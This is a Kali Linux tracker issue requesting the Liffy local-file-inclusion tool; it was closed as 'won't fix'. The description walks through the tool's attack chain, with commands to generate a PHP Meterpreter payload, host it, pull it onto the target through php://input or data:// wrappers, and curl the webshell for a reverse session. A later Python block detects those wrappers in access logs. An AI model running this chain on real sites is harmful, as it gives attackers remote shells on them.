View Issue Details

ID: 0001415
Project: Kali Linux
Category: New Tool Requests
View Status: public
Last Update: 2020-02-10 18:15
Reporter: saberzaid
Assigned To:
Priority: normal
Severity: feature
Reproducibility: have not tried
Status: closed
Resolution: won't fix
Summary: 0001415: Liffy - Local File Inclusion Exploitation Tool
Description

Liffy is a tool written in Python designed to exploit local file inclusion vulnerabilities using three different techniques that will get you a working web shell. The first two make use of the built-in PHP wrappers php://input and data://. The third makes use of the process control extension called 'expect'.

For those unfamiliar I've included some links that highlight the usage of these techniques in LFI exploitation.
Exploitation
Once you have found a local file inclusion vulnerability, you simply point liffy at its location and select which technique you want to use.
./liffy --url http://target/vuln/file.php?= --data

The tool will create a PHP Meterpreter payload using msfpayload and drop it into your /tmp directory. It will then attempt to use the PHP wrapper to download the generated shell which you should have hosted by either using Node or Python's HTTP web servers.
http-server /tmp -p 8000

If all this works you should see a GET request to your shell, which is then downloaded to the working directory on the target webserver. From there a Metasploit resource file is created for you to spawn up a listening handler for inbound connections from the reverse PHP Meterpreter.
msfconsole -r php_listener.rc

Now you simply curl the location of your webshell and you should see a new Meterpreter session spawn.
curl --silent http://target/vuln/7ka0tqsq.php

download:
https://github.com/rotlogix/liffy
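
For the defensive side of the three wrappers named in the description, the following is an added example (not part of the original issue and not Liffy's code) that flags access-log requests whose query parameter value begins with one of them, including percent-encoded and double-encoded forms. The log lines, paths and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Wrappers named in the issue description; "data:" also covers "data://".
WRAPPER_RE = re.compile(r"^\s*(php://input|data:|expect://)", re.IGNORECASE)
# Request line of a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_wrapper_params(log_line):
    """Return (parameter, wrapper) pairs whose value starts with a flagged wrapper."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    hits = []
    for pair in urlsplit(match.group("target")).query.split("&"):
        name, _, value = pair.partition("=")
        wrapper = WRAPPER_RE.match(fully_decode(value))
        if wrapper:
            hits.append((fully_decode(name), wrapper.group(1).lower()))
    return hits


# Constructed sample lines (documentation addresses, hypothetical paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Jun/2014:22:36:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512',
    '192.0.2.44 - - [12/Jun/2014:22:36:05 +0000] "POST /index.php?page=php://input HTTP/1.1" 200 87',
    '192.0.2.44 - - [12/Jun/2014:22:36:09 +0000] "GET /index.php?page=data%3A%2F%2Ftext%2Fplain%3Bbase64%2CQUJD HTTP/1.1" 200 90',
    '192.0.2.44 - - [12/Jun/2014:22:36:12 +0000] "GET /index.php?id=1&page=%2565xpect%253A%252F%252Fx HTTP/1.1" 500 0',
    '192.0.2.10 - - [12/Jun/2014:22:36:20 +0000] "GET /docs?ref=https://example.org/data:notes HTTP/1.1" 200 40',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for name, wrapper in find_wrapper_params(line):
            print(f"suspicious wrapper {wrapper!r} in parameter {name!r}: {line}")
```

With php://input the included content travels in the request body, so an access log shows only the wrapper name in the URL. In PHP, php://input and data:// inside an include also depend on allow_url_include being enabled in php.ini.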

Activities

jaimechiquita111

2014-07-24 22:39

reporter   ~0002371

Last edited: 2014-07-24 22:40

Nice one Mr saberzaid...
I've submitted the same but after you, sorry to Mr dookie for the duplication.

I've never read about Local File Inclusion Exploitation Tool, maybe metasploitable will give positives?!?

g0tmi1k

2018-01-29 15:20

administrator   ~0008509

To help speed up the process of evaluating the tool, please make sure to include the following information (the more information you include, the more beneficial it will be for us):

  • [Name] - The name of the tool
  • [Version] - What version of the tool should be added?
    --- If it uses source control (such as git), please make sure there is a release to match (e.g. git tag)
  • [Homepage] - Where can the tool be found online? Where to go to get more information?
  • [Download] - Where to go to get the tool?
  • [Author] - Who made the tool?
  • [Licence] - How is the software distributed? What conditions does it come with?
  • [Description] - What is the tool about? What does it do?
  • [Dependencies] - What is needed for the tool to work?
  • [Similar tools] - What other tools are out there?
  • [How to install] - How do you compile it?
  • [How to use] - What are some basic commands/functions to demonstrate it?

g0tmi1k

2018-03-13 10:51

administrator   ~0008920

How is the tool, say, better than LFISuite? 0004305

g0tmi1k

2020-02-10 18:15

administrator   ~0012196

Project now 404's

Issue History

Date Modified Username Field Change
2014-06-12 22:36 saberzaid New Issue
2014-06-29 19:52 vichet Issue cloned: 0001467
2014-07-24 22:39 jaimechiquita111 Note Added: 0002371
2014-07-24 22:40 jaimechiquita111 Note Edited: 0002371
2014-07-24 22:40 jaimechiquita111 Note Edited: 0002371
2018-01-29 15:20 g0tmi1k Note Added: 0008509
2018-03-13 10:51 g0tmi1k Note Added: 0008920
2019-12-09 13:30 g0tmi1k Severity minor => feature
2020-02-10 18:15 g0tmi1k Note Added: 0012196
2020-02-10 18:15 g0tmi1k Status new => closed
2020-02-10 18:15 g0tmi1k Resolution open => won't fix